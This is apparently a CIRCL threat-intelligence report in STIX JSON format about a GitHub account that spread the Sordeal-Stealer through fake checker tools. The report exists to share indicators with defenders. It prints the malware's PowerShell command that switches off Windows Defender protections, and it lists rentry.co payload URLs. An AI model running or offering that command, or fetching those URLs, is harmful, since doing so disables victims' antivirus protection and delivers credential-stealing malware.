219 lines
56 KiB
JSON
219 lines
56 KiB
JSON
|
{
|
||
|
|
"type": "bundle",
|
||
|
|
"id": "bundle--659a6331-0690-4b3b-ae16-e29a1fc31fc2",
|
||
|
|
"objects": [
|
||
|
|
{
|
||
|
|
"type": "identity",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T15:06:39.000Z",
|
||
|
|
"modified": "2023-04-11T15:06:39.000Z",
|
||
|
|
"name": "CIRCL",
|
||
|
|
"identity_class": "organization"
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "report",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "report--659a6331-0690-4b3b-ae16-e29a1fc31fc2",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T15:06:39.000Z",
|
||
|
|
"modified": "2023-04-11T15:06:39.000Z",
|
||
|
|
"name": "Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer",
|
||
|
|
"published": "2023-04-11T15:07:07Z",
|
||
|
|
"object_refs": [
|
||
|
|
"observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2",
|
||
|
|
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2",
|
||
|
|
"malware--508397b3-2a52-4012-9969-f63c7d4f3872",
|
||
|
|
"indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7",
|
||
|
|
"indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4",
|
||
|
|
"indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111",
|
||
|
|
"indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff"
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"Threat-Report",
|
||
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
||
|
|
"type:OSINT",
|
||
|
|
"osint:lifetime=\"perpetual\"",
|
||
|
|
"osint:certainty=\"50\"",
|
||
|
|
"tlp:clear",
|
||
|
|
"misp-galaxy:stealer=\"Sordeal-Stealer\"",
|
||
|
|
"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Alternative Protocol - T1048\"",
|
||
|
|
"misp-galaxy:mitre-attack-pattern=\"Browser Session Hijacking - T1185\"",
|
||
|
|
"misp-galaxy:mitre-attack-pattern=\"Keylogging - T1056.001\"",
|
||
|
|
"misp-galaxy:mitre-attack-pattern=\"GUI Input Capture - T1056.002\""
|
||
|
|
],
|
||
|
|
"object_marking_refs": [
|
||
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "observed-data",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T07:18:04.000Z",
|
||
|
|
"modified": "2023-04-11T07:18:04.000Z",
|
||
|
|
"first_observed": "2023-04-11T07:18:04Z",
|
||
|
|
"last_observed": "2023-04-11T07:18:04Z",
|
||
|
|
"number_observed": 1,
|
||
|
|
"object_refs": [
|
||
|
|
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2"
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"github-user\"",
|
||
|
|
"misp:meta-category=\"misc\"",
|
||
|
|
"misp:to_ids=\"False\""
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "user-account",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "user-account--8c3b7eda-d3b0-4687-8150-230759232cb2",
|
||
|
|
"account_login": "okkz",
|
||
|
|
"account_type": "github",
|
||
|
|
"x_misp_bio": "Self-taught python & web developer.",
|
||
|
|
"x_misp_link": "https://github.com/okkz",
|
||
|
|
"x_misp_profile_image": {
|
||
|
|
"value": "120434897.jpeg",
|
||
|
|
"data": "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
|
||
|
|
},
|
||
|
|
"x_misp_repository": [
|
||
|
|
"Tiktok-Username-Checker",
|
||
|
|
"Steam-ID-Checker",
|
||
|
|
"Tiktok-Username-Checker",
|
||
|
|
"lure-s-tiktok-username-checker-LEAKED",
|
||
|
|
"Steam-ID-Checker",
|
||
|
|
"Discord-Token-Checker"
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "malware",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "malware--508397b3-2a52-4012-9969-f63c7d4f3872",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T07:43:07.000Z",
|
||
|
|
"modified": "2023-04-11T07:43:07.000Z",
|
||
|
|
"description": "Fetched from https://rentry.co/shitbymyself/raw",
|
||
|
|
"is_family": false,
|
||
|
|
"kill_chain_phases": [
|
||
|
|
{
|
||
|
|
"kill_chain_name": "misp-category",
|
||
|
|
"phase_name": "misc"
|
||
|
|
}
|
||
|
|
],
|
||
|
|
"implementation_languages": [
|
||
|
|
"PowerShell"
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"script\"",
|
||
|
|
"misp:meta-category=\"misc\"",
|
||
|
|
"misp:to_ids=\"False\""
|
||
|
|
],
|
||
|
|
"x_misp_script": "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2",
|
||
|
|
"x_misp_state": "Malicious"
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "indicator",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T08:08:34.000Z",
|
||
|
|
"modified": "2023-04-11T08:08:34.000Z",
|
||
|
|
"pattern": "[url:value = 'https://rentry.co/shitonyourAV/raw']",
|
||
|
|
"pattern_type": "stix",
|
||
|
|
"pattern_version": "2.1",
|
||
|
|
"valid_from": "2023-04-11T08:08:34Z",
|
||
|
|
"kill_chain_phases": [
|
||
|
|
{
|
||
|
|
"kill_chain_name": "misp-category",
|
||
|
|
"phase_name": "network"
|
||
|
|
}
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"url\"",
|
||
|
|
"misp:meta-category=\"network\"",
|
||
|
|
"misp:to_ids=\"True\""
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "indicator",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T08:08:42.000Z",
|
||
|
|
"modified": "2023-04-11T08:08:42.000Z",
|
||
|
|
"pattern": "[url:value = 'https://rentry.co/shitbymyself/raw']",
|
||
|
|
"pattern_type": "stix",
|
||
|
|
"pattern_version": "2.1",
|
||
|
|
"valid_from": "2023-04-11T08:08:42Z",
|
||
|
|
"kill_chain_phases": [
|
||
|
|
{
|
||
|
|
"kill_chain_name": "misp-category",
|
||
|
|
"phase_name": "network"
|
||
|
|
}
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"url\"",
|
||
|
|
"misp:meta-category=\"network\"",
|
||
|
|
"misp:to_ids=\"True\""
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "indicator",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T08:08:50.000Z",
|
||
|
|
"modified": "2023-04-11T08:08:50.000Z",
|
||
|
|
"pattern": "[url:value = 'https://rentry.co/9ops5/raw']",
|
||
|
|
"pattern_type": "stix",
|
||
|
|
"pattern_version": "2.1",
|
||
|
|
"valid_from": "2023-04-11T08:08:50Z",
|
||
|
|
"kill_chain_phases": [
|
||
|
|
{
|
||
|
|
"kill_chain_name": "misp-category",
|
||
|
|
"phase_name": "network"
|
||
|
|
}
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"url\"",
|
||
|
|
"misp:meta-category=\"network\"",
|
||
|
|
"misp:to_ids=\"True\""
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "indicator",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff",
|
||
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
|
"created": "2023-04-11T08:08:59.000Z",
|
||
|
|
"modified": "2023-04-11T08:08:59.000Z",
|
||
|
|
"pattern": "[url:value = 'https://rentry.co/khsph/raw']",
|
||
|
|
"pattern_type": "stix",
|
||
|
|
"pattern_version": "2.1",
|
||
|
|
"valid_from": "2023-04-11T08:08:59Z",
|
||
|
|
"kill_chain_phases": [
|
||
|
|
{
|
||
|
|
"kill_chain_name": "misp-category",
|
||
|
|
"phase_name": "network"
|
||
|
|
}
|
||
|
|
],
|
||
|
|
"labels": [
|
||
|
|
"misp:name=\"url\"",
|
||
|
|
"misp:meta-category=\"network\"",
|
||
|
|
"misp:to_ids=\"True\""
|
||
|
|
]
|
||
|
|
},
|
||
|
|
{
|
||
|
|
"type": "marking-definition",
|
||
|
|
"spec_version": "2.1",
|
||
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
||
|
|
"created": "2017-01-20T00:00:00.000Z",
|
||
|
|
"definition_type": "tlp",
|
||
|
|
"name": "TLP:WHITE",
|
||
|
|
"definition": {
|
||
|
|
"tlp": "white"
|
||
|
|
}
|
||
|
|
}
|
||
|
|
]
|
||
|
|
}
|